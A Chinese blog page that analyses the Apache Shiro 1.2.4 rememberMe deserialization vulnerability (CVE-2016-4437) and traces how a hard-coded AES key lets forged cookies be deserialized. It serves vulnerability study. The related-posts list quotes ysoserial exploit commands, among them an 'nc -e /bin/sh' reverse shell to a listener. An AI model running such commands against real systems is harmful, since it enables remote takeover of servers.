shiro反序列化工具_Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)源码解析

最新推荐文章于 2024-08-08 17:56:47 发布
最新推荐文章于 2024-08-08 17:56:47 发布
阅读量217 收藏
点赞数
文章标签: shiro反序列化工具 shiro反序列化检测工具 shiro反序列化漏洞修复 shiro源码

1c284c726376d114049a41a783993752.png

Apache Shiro

Apache Shiro是一个功能强大且灵活的开源安全框架,主要功能包括用户认证、授权、会话管理以及加密。在了解该漏洞之前,建议学习下Apache Shiro是怎么使用.

debug环境

  • jdk1.8
  • Apache Shiro 1.2.4
  • 测试demo

本地debug需要以下maven依赖

<!-- https://mvnrepository.com/artifact/org.apache.shiro/shiro-core -->
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-core</artifactId>
            <version>1.2.4</version>
        </dependency>
<!-- https://mvnrepository.com/artifact/org.apache.shiro/shiro-web -->
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-web</artifactId>
            <version>1.2.4</version>
        </dependency>

漏洞产生流程

一般登录时,存在记住我的功能,如下图:

fd9c8708d2cee3eb571428c7aaf8c684.png

Apache Shiro框架就是在实现该功能时存在漏洞.

Apache Shiro如何记住我?

  1. 序列化用户身份对象.(这里为SimplePrincipalCollection)
  2. 对序列化后的数据进行AES加密,密钥为常量.
  3. base64编码
  4. 设置到cookie中,cookie name等于rememberMe.

Apache Shiro如何解析我?

  1. 读取cookie中的rememberMe的值.
  2. 对其值进行base64解码.
  3. AES解密
  4. 反序列化

我们如何攻击?

通过以上,我们可以看出,只要手动构造一个反序列化payload,进行AES加密(密钥我们知道的)和base64编码,即可在反序列化时执行任何操作.

源码解析

记住我源码分析

打开登录界面,输入admin/vulhub,勾选Remember me,点击登录.首先进入用户代码中调用Apache Shiro验证接口的方法.

cd04b6c551540cdb9b00443d42ffb5fb.png

接着正式进入Apache Shiro处理. 一些不重要的调用过程省略,调用栈如下:

0231f72824746187d3c48f527a03b148.png

我们在org.apache.shiro.mgt/AbstractRememberMeManager.onSuccessfulLogin下断点.

389ff30ef3509cbad4059a32399f2bfc.png

从上面代码我们发现,首先程序清理了验证信息.接着调用rememberIdentity来保存新的验证信息.跟进该方法.

a9ea8cd4ba729aa8963a01fee855d1d8.png

我们发现该方法首先去获取一个PrincipalCollection对象.该对象就是保存在cookie中的对象.接着调用rememberIdentity保存该对象.跟进rememberIdentity方法.

c748cf2516b10ff7bfadc8514d9e3a6a.png

我们先看它是如何反序列化和AES加密的.跟进byte[] bytes = convertPrincipalsToBytes(accountPrincipals);.

5f2c9a8d23f25dd50e02ba4459e7d3a3.png

从以上代码可以发现,调用serialize序列化为byte数组.这一步不做分析.我们重点看看如何进行AES加密的.跟进encrypt(bytes).

449c38af6a673629bb5a0e6318fb24ae.png

首先该方法获取AES加密service.再通过getEncryptionCipherKey()得到密钥.最后对序列化后的对象进行加密.其中密钥是一个常量,该常量在org/apache/shiro/mgt/AbstractRememberMeManager.AbstractRememberMeManager设置.常量值如下:

67a51b758e351e133b4fbdd21a25c157.png

回到rememberIdentity方法,我们继续来看下面的rememberSerializedIdentity方法.

340929fbba5b79d9181e15e6025af67b.png

通过以上过程,Apache Shiro完成了如何记住我.

解析我源码分析

在源码分析之前,提一个debug遇到的坑,Apache Shiro在设置rememberme这个cookie的同时也会设置一个JSessionid cookie,当通过浏览器进行发送请求,请删除掉JSessionid cookie,否则Apache Shiro通过JSessionid获取验证信息,并不会经过解析我的过程,也就无法debug 我们在上一步登录后,删除JSessionid cookie,访问http://localhost:8080.在org/apache/shiro/mgt/DefaultSecurityManager.getRememberedIdentity下断点.

b2264f00c0b102c209ae5e417ce7cd5f.png

该方法主要获取存储在cookie中的Principal对象,我们跟进getRememberedPrincipals方法内.

cbf281a743486edf1d9d2acba96a28be.png

从上述源码可以发现,通过getRememberedSerializedIdentity进行cookie的提取和base64解密.接着通过convertBytesToPrincipals进行AES解密和反序列化得到Principals对象.我们重点看看convertBytesToPrincipals该方法.

578f5051f5adeb68a9d3fbac8b140bf5.png

很显然,该方法中通过decrypt进行AES解密.跟进decrypt.

93d8b78b08a5cda48da92f74a3dbdb0c.png

该方法和加密基本一样.先获取cipherService,再通过密钥解密. 再回到convertBytesToPrincipals方法中.调用deserialize进行反序列化.至此反序列化漏洞的触发过程就结束了.

修复

我们再来看看1.2.5如何修复的. 1.2.5:

c66494d4bfbc6a628d273434522f1c52.png

1.2.4:

3416e593afb9c7b40bef7a4ec93afeac.png

通过上述可以看出1.2.5将密钥动态生成.避免了攻击者可以自己生成序列化恶意对象.这个漏洞可以说是硬编码密钥导致的反序列化漏洞.

最后

关于该漏洞的利用可以参考vulhub.该文章旨在分享,后面也会就vulhub上的demo来做一系列的漏洞原理的分享.

weixin_39636610
关注
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1583
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3268
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
shiro-1.2.4-rce:shiro <= 1.2.4反序列化命令脚本
05-22
Readme shiro <= 1.2.4 反序列化远程命令执行利用脚本 使用延时判断key和gadget,即使目标不出网也可以检测是否存在漏洞 python脚本需要调用ysoserial-sleep.jar,ysoserial-sleep.jar文件并不是原版的,增加了延时命令功能,故不要使用原版ysoserial,否则将无法检测 +-------------------------------------------------------------------------------------------------------+ + DES: By zhzyker as https://github.com/zhzyker/exphub + + Vuln Name: CV
Java代码审计-shiro反序列化漏洞分析
最新发布
qq_44780157的博客
08-08 1066
Shiro550反序列化漏洞原理分析
反序列化工具_Apache Shiro 1.2.4反序列化漏洞复现(CVE20164437
weixin_39943799的博客
12-14 571
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。影响版本:Apache Shiro <= 1.2.4使用vulhub搭建docker环境进入主页使用ShiroExploit图形化工具(工具下载地址:https://github.com/feihong-cs/ShiroExploit-Depreca...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Shiro 550 反序列化漏洞 详细分析+poc编写
热门推荐
god_Zeo的安全博客
09-03 1万+
0x00 前言 shiro反序列化漏洞这个从 shiro 550 开始,在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用 这个漏洞一直都很好用,特别是一些红蓝对抗HW的下边界突破很好用 遂研究一下这个漏洞的成因和分析一下代码 0x01 Shiro 550 漏洞描述 Apache Shiro RememberMe 反序列化导致的命令执行漏洞 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理 编号:Shiro-550, CVE-2016-4437
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2867
CVE-2016-4437 Shiro反序列化漏洞复现
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
漏洞复现】shiro 反序列化CVE-2016-4437
m0_61101264的博客
09-11 287
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Shiro_exploit:Apache Shiro Java反序列化漏洞分析和利用
03-10
Apache Shiro Java反序列化进攻分析及利用 0x00项目地址 0x01概述 两者天被派去去护网&重保,态势感知报告了一条冰蝎的远程代码执行的纠正,在通过日志以及webshel​​l及相关信息,红队大概是通过shiro反序列化拿到主机权限,之前一大佬还特别分享过shiro反序列化断裂,还没来及研究就碰上了,。正好这个机会研究分析一波, 四郎用remembreme这个cookie的对用户进行鉴权,防止出现越权问题,它使用CookieRemembreMeManager这个类,对remebremecookie的键使用ObjectInputStream类进行序列化,然后对字符流进行用AES加密方式对其进行的base64编码,然后返回客户端remebremeCookie ,这其实是有问题的,shiro把其实aes的密钥硬编码在代码里的类,我们可以通过ysoserial这个的Common
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
文件内包含内容如下: 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
Shiro反序列化漏洞原理&代码分析(3)
qq_63217130的博客
02-27 430
创建PriorityQueue对象 并add TemplatesImpl_instance(RCE类) 以便compare的时候传入RCE类对象然后transform(TemplatesImpl_instance) 去实例化RCE类的对象。相比调用ChainedTransformer的更加transform的POC要简单一些因为不用去链式调用了嘛,我们只用最后调用一下InvokerTransformer的transform方法实例化一个对象就好了。由于我们要调用的链条如下。那么最终poc就是这样的。
Apache Shiro 1.2.4反序列化漏洞分析
jiangbb8686的博客
08-30 3686
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 0×00 Apache Shiro 这个组件的漏洞很久之前就爆出来了,但是最近工作中又遇到了,刚好最近也在看Java反序列化的东西,所以决定拿出来再分析一下,期间也遇到了一些奇怪的问题。 网上的分析文章中大部分都是手动添加了commons-collections4-4.0的依...
Shiro框架漏洞总结
zhuyi666的博客
03-23 8289
Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
Shiro反序列化漏洞利用笔记
文公子的博客
12-10 7289
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache Sh
Apache Shiro 反序列化漏洞利用工具使用
Big World
02-15 9452
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞工具下载地址:Shiro_Exploit 该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget...
Apache Shiro 1.2.4反序列化漏洞
07-27
- *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值